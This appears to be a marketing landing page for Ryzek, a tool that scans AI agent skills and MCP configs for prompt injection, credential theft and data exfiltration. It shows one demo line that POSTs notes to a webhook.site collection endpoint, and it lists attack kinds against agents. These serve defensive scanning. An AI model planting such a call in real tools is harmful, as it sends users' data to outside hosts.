Security scanning for AI agents
Know what a skill does before your agent runs it.
Ryzek reads skills, MCP server configs and tool manifests and flags prompt injection, hidden instructions, credential theft, over-broad permissions and tools that changed after you approved them. Every finding comes with a confidence score and the reason for it.
Free plan: 20 scans a month with every rule included. Scanned files are read in memory and never stored.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek found 1 issue
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Real scanner output, generated when this page was built.
The trailer
Ryzek in eighty seconds.
What agents are quietly being handed — and what Ryzek shows you before they run it.
How it works
From upload to a verdict you can act on.
No installation. Sign in, add your files, read what Ryzek found and why.
-
01 · Sign in
Create a free account
Sign in with an account you already have. Your scan allowance and tool history follow you to any device.
-
02 · Add files
Drop in what your agent loads
Skill folders with their scripts, MCP configs, tool manifests,
package.jsonorrequirements.txt. -
03 · Read
Get a reason, not just a flag
Each finding shows its severity, how confident Ryzek is, why, the exact text that triggered it and its OWASP category.
-
04 · Re-scan
Find out when a tool changes
Ryzek keeps a fingerprint of each tool — not the file — so a later scan can tell you if something you approved has changed.
What it catches
54 rules across five kinds of risk.
Every rule has a live demo on the rules page: the file, the part that matters, and what the scanner actually reports.
18 rules · Agent safety
Text aimed at the AI
Prompt injection, instructions hidden in comments or invisible characters, forged tool results and memory poisoning.
5 rules · Exfiltration
Routes for your data to leave
Collection endpoints, DNS tunnelling, image beacons and tools that pair private reads with public writes.
7 rules · Credentials
Secrets in the wrong place
Hard-coded keys, tokens in MCP configs, reads of credential stores and shell history, and cloud metadata requests.
13 rules · Supply chain
Where the code came from
Unpinned and impersonated servers, known-vulnerable versions, install hooks, shadow servers and tools that changed after approval.
11 rules · Execution
More power than the job needs
Over-broad permissions, auto-approved tools, sandbox escapes, persistence and command injection.
All rules
See every demo →
Filter by risk, read the plain-English version, and see the real result for each rule.
Why Ryzek
Findings you can check, from a scanner that says where it stops.
A scanner that cries wolf gets ignored, and one that overclaims gets trusted when it shouldn't be. Ryzek is built to avoid both.
Read what Ryzek can't see — including behaviour that only appears while a server is running, and what's inside compiled programs.
- A stated reason on every finding. How confident the rule is, and why — so a low-confidence hint doesn't read like a confirmed attack.
- Drift detection. A tool that quietly changes after you approved it is flagged on your next scan.
- Your files aren't kept. Uploads are scanned in memory and discarded. We store scan counts and tool fingerprints, never contents.
- Mapped to OWASP. Every rule maps to a category in the OWASP MCP Top 10.
- Every rule on every plan. Paid plans will add volume and automation, not detection.
Pricing
Start free. Every rule included.
The free plan runs the full rule set, capped by volume. Paid plans with higher limits are opening soon.
Available now
Free — $0
20 scans a month, all 54 rules, drift detection and downloadable reports.
Opening soon
Pro, Pro Plus and Teams
From $16 a month, with 300 to 1,500 scans per month. See what's included and ask to be told when they open.
Questions
Common questions.
Do you keep the files I scan?
No. Files are sent to the scanner over HTTPS, scanned in memory, and discarded when the result comes back. What we store is how many scans you've used, and a fingerprint of each tool — hashes plus its permission labels — so we can tell you if it changes. The privacy policy has the detail.
Why do I need an account?
So your scan allowance and your tool history go wherever you do. Drift detection only works if Ryzek remembers what a tool looked like the last time you scanned it.
Which files can I scan?
Skill folders (a SKILL.md plus the scripts beside it), MCP config files such as .mcp.json or claude_desktop_config.json, JSON tool manifests, and package.json or requirements.txt for install hooks and vulnerable dependencies.
Does a clean result mean a skill is safe?
No — it means none of the 54 rules matched. Ryzek reads files; it doesn't run them, so behaviour that only appears at run time, or inside a compiled program, is outside what it can see. A clean scan is a good sign, not a guarantee.
Can I run it in CI?
Not yet. CI integration is planned for the paid plans. If it matters to you, tell us — it helps us decide what comes first.
Scan the skills your agent already trusts.
It takes a minute to sign up and add your first files.